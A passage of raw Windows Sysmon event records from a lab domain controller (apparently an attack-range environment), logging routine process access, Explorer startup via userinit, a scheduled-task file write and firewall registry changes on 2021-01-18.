10341000x80000000000000009993Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.039{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F9-6005-ED04-00000000A301}3532C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010311Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.961{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010310Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.680{59A5CD1D-8E46-6005-1600-00000000A301}15442108C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010309Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.680{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010308Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.664{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010307Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.649{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000010306Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.649{59A5CD1D-93F6-6005-E604-00000000A301}48881684C:\Windows\system32\csrss.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000010305Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.649{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010304Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.649{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010303Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.649{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010302Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.649{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010301Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.649{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000010300Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.649{59A5CD1D-8E46-6005-1600-00000000A301}15442108C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\UBPM.dll+ac60|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e12a|c:\windows\system32\UBPM.dll+dd82|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+389a|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010299Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.649{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000010298Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT10532021-01-18 13:58:18.633{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exeC:\Windows\System32\Tasks\CreateExplorerShellUnelevatedTask2021-01-18 13:58:18.633 10341000x800000000000000010297Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.633{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-93FA-6005-FB04-00000000A301}3820C:\Windows\Explorer.EXE0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010296Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.633{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-93FA-6005-FB04-00000000A301}3820C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010295Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.618{59A5CD1D-8E46-6005-1600-00000000A301}15442288C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FB04-00000000A301}3820C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010294Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.618{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FB04-00000000A301}3820C:\Windows\Explorer.EXE0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010293Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.524{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010292Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.524{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010291Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.524{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010290Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.524{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010289Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.524{59A5CD1D-93F6-6005-E604-00000000A301}48883504C:\Windows\system32\csrss.exe{59A5CD1D-93FA-6005-FB04-00000000A301}3820C:\Windows\Explorer.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000010288Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.524{59A5CD1D-93FA-6005-F904-00000000A301}28604336C:\Windows\system32\userinit.exe{59A5CD1D-93FA-6005-FB04-00000000A301}3820C:\Windows\Explorer.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\userinit.exe+1cd8|C:\Windows\system32\userinit.exe+23e5|C:\Windows\system32\userinit.exe+346e|C:\Windows\system32\userinit.exe+3725|C:\Windows\system32\userinit.exe+4553|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000010287Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.370{59A5CD1D-93FA-6005-FB04-00000000A301}3820C:\Windows\explorer.exe10.0.14393.4169 (rs1_release.210107-1130)Windows ExplorerMicrosoft® Windows® Operating SystemMicrosoft CorporationEXPLORER.EXEC:\Windows\Explorer.EXEC:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=F7FDECA990692D53D7E4E396B0BD711E,SHA256=1F955612E7DB9BB037751A89DAE78DFAF03D7C1BCC62DF2EF019F6CFE6D1BBA7,IMPHASH=8D2880102609AA4B23679BD4FEBEBC95{59A5CD1D-93FA-6005-F904-00000000A301}2860C:\Windows\System32\userinit.exeC:\Windows\system32\userinit.exe 13241300x800000000000000010286Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:18.477{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch\EpochDWORD (0x000005dc) 13241300x800000000000000010285Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:18.321{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Options\EnablePacketQueueDWORD (0x00000000) 10341000x800000000000000010284Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.321{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010283Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.321{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010282Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 